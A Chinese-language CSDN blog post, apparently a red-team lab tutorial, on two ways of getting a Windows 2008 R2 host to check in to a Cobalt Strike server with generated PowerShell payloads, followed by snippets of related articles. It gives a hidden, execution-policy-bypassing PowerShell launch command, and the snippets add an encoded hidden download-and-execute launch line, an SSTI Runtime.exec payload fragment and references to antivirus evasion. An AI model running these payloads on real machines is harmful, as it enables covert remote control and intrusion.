cs通过生成Payload上线(Powershell的两种上线方式)

最新推荐文章于 2024-05-03 19:05:25 发布
最新推荐文章于 2024-05-03 19:05:25 发布
阅读量753 收藏 9
点赞数 8
文章标签: 服务器 linux 运维 学习 安全 ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60584088/article/details/135580633
版权

cs通过生成Payload上线(Powershell的两种上线方式)

cs中通过Payload生成有两种方式,一种是执行模式—会直接生成txt文件,文件内容为当前需要执行的命令,直接在powershell中执行所有命令即可,另一种是直接生成文件,通过Powershell运行文件来达到上线的目的

在这里插入图片描述
在这里插入图片描述

这里环境为:
  • windows2008 R2一台
  • kali主机一台

直接将生成好的两个文件放置在08机器上,通过执行命令来让08上线
powershell -ExecutionPolicy bypass -w hidden -File payload.ps1
在这里插入图片描述
这里Powershell通过运行指定文件直接上线

通过运行执行模式来上线:
打开生成出来的txt文件,在文件中复制所有命令,打开Powershell窗口直接运行即可
在这里插入图片描述
回车运行,成功上线
在这里插入图片描述

久恙502
关注
  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
powershell cs上线_sqlserver注入到cs上线
weixin_39827905的博客
11-21 311
随手记录一下项目挖洞的情况,因为是私密项目,脱敏之后,权当是公众号水文章了,也是顺带记录一下自己挖洞的历程,希望一天比一天进步,发过的文章就是最好的见证成长的记录。狗头在上,打码为敬一看这个界面,就知道是老系统,肯定存在很多问题,随手一试,发现万能密码直接登录成功其他端口测试发现数据库为sqlserver,且是sa用户尝试开启xp扩展Poc:uname=admin';EXEC maste...
CobaltStrike 使用教程(二)之powershell上线
m0_53087192的博客
03-10 5341
使用powershell上线 方法一 选择生成payload,选择如图。 复制文档里的内容,粘贴进cmd,并运行。 成功上线 方法二 选择生成payload,选择如图。 将生成payload.ps1上传的要上线的机器上,cmd运行 powershell -file payload.ps1 ps:有时会有以下提示 cmd运行 powershell set-ExecutionPolicy RemoteSigned 在运行,成功上线 powershell -file payload.ps1
CS木马的几种上线方式总结
Shanfenglan's blog
10-20 12万+
CATALOG前言windows相关上线方式1.利用mshta与wmic上线2.利用powershell上线3.利用msbuild上线linux相关上线方式1.利用Cross2上线linux主机 前言 CS上线方式还是有不少的,但是时间长不看容易忘记一部分,博客记录也比较分散导致找起来比较麻烦,因此写了这篇博客记录一下CS上线的相关知识点。 windows相关上线方式 1.利用mshta与wmic上线 不用powershell执行powershell脚本与xsl文件不落地上线 2.利用powershell
CS payload生成器(Generator)介绍与上线方式
good good study
02-24 3426
该模块可以生成多种语言的后门Payload,包括C, C#, Python, Java, Perl, Powershell脚本,Powershell命令,Ruby, Raw,免杀框架Veli中的shellcode等。
2024年网络安全最全CS木马的几种上线方式总结_cs如何上线(1)
最新发布
2401_84281638的博客
05-03 626
CS上线方式还是有不少的,但是时间长不看容易忘记一部分,博客记录也比较分散导致找起来比较麻烦,因此写了这篇博客记录部分CS上线的相关知识点。
CS通过(CDN+证书)powershell上线详细版
qq_50854662的博客
06-01 1286
cdn
powershell cs-UTF-16LE编码上线
weixin_42109829的博客
07-05 649
当我们要上线主机的时候,可能会因为你的代码含有木马字符串,导致无法上线1、 例子 powershell.exe -exec bypass -encodedCommand ZQBjAGgAbwAgACIAMQAyADMAIgA=2、原句子 3、UTF-16LE编码后 (在powershell上能直接执行) powershell.exe -w hidden -exec bypass -encodedCommand SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAg
使用powershell免杀上线CS的新方式---利用图片
Shanfenglan's blog
04-06 5441
文章目录利用工具模拟上线参考文章 利用工具 Invoke-PSImage 任意一张图片 模拟上线 参考文章 Shellcode隐写到预期RGB免杀上线到CobaltStrike
Cobalt_Strike_beacon免杀上线Powershell1
08-03
第一步,创建监听器,并用对应的监听器生成的 "Powershell payload " 第二步,回到本地机器上,先准备好一张大点的图片,比如随便去找一张"192
黑盒PAYLOAD_生成技法.pdf
08-08
而整个过程的核心就在于如何建立场景规则集,Gaba提到了几种方式,包括人为总结(自定义)、参数黑白名单、根据类型进行排列组合、根据历史记录进行范围调整等。 面对“东北人不脱貂”而淋漓大汗的Gaba,混迹于各大...
黑盒 Payload 生成技法.pdf
10-30
黑盒 Payload 生成技法.pdf
ssti-payload:SSTI有效载荷生成
02-06
生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang....
msfvenom常用生成payload命令(第十课).docx
09-15
MSFVenom 提供了多种 Payload 生成方式,包括 Windows、Mac、Linux、Android 等多种平台。 Windows Payload 生成命令 使用以下命令生成 Windows 平台的 Meterpreter Payload: `msfvenom -a x86 --platform ...
红队攻防之powershell上线基础免杀(一)
02-25 542
不努力,你背井离乡干嘛?当卧底啊
powershell cs上线_红队CS工具的基本使用
weixin_39976382的博客
10-21 1198
简介:Cobalt Strike 一款以Metasploit为基础的GUI框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木马生成等。还可以进行钓鱼攻击包括:网站克隆、目标信息获取、java执行、浏览器攻击等CS主要用于团体协作,可以让多个攻击者同时连接到团体服务器,共享信息。环境搭建:CS分为客户端和服务端,其中服务端只能运行在Linux系统...
Metasploit - Powershell
Nixawk
11-16 1349
msf post(multi_meterpreter_inject) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ----------
Cobaltstrike系列教程(二)Listner与Payload生成
J0o1ey Blog
08-01 1万+
0x000-前文 Cobaltstrike系列教程(一)简介与安装 https://bbs.ichunqiu.com/thread-52937-1-1.html PS:原本想完成日更目标的,但昨天在研究无线,就没更,今天加班~ 0x001-Listner(监听器)介绍 ①Cobaltstrike listner简介 可能有一些小白并不理解什么叫做listner,在此科普一下。 Listner(监...
CS EXE上线主机+文件下载上传键盘记录
流浪法师的博客
07-09 717
书接上文,CobaltStrike_1_部署教程及CS制作office宏文档钓鱼教程,该篇介绍【使用CS生成对应exe木马,上线主机;对上线主机进行,文件下载,文件上传,键盘记录】
不用powershell执行powershell脚本与xsl文件不落地上线
热门推荐
Shanfenglan's blog
09-14 17万+
CATALOG前言powershell的本质小试牛刀 前言 前几天在学习windows命名管道的时候偶然看到一篇文章: we don’t neet powershell.exe 作者提供了一种特殊的运行powershell脚本的方式,这种方式既有趣又实用,是通过c#来实现的,因此这也坚定了我学习c#的步伐。 powershell的本质 我们都知道powershell是一个exe程序,它可以执行自己的命令或者powershell脚本。其实powershell的本质就是解释器,类似于python。python
metasploit 如何生成 payload
05-25
Metasploit是一个广泛使用的渗透测试框架,可以用于生成各种类型的payload。它提供了多种生成payload的模块,如下所示: 1. `msfvenom`命令:该命令可以生成各种类型的payload,包括反向Shell、Meterpreter Shell、Web Shell等。使用`msfvenom`命令时,你需要指定payload类型、目标平台、监听端口、加密方式等相关参数。 2. `exploit/multi/handler`模块:该模块可以监听特定的端口,并且在接收到payload后,将其与远程主机建立连接,从而实现对目标主机的控制。 3. `exploit/windows/local/payload_inject`模块:该模块可以生成用于本地提权的payload。 4. `exploit/windows/mssql/mssql_payload`模块:该模块可以生成针对Microsoft SQL Server的payload。 需要注意的是,生成payload不是Metasploit的唯一功能,该框架还提供了许多其他的渗透测试模块,如端口扫描、漏洞扫描、渗透攻击等。如果你想学习如何使用Metasploit进行渗透测试,建议你先学习相关的网络安全知识,以避免不必要的损失。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值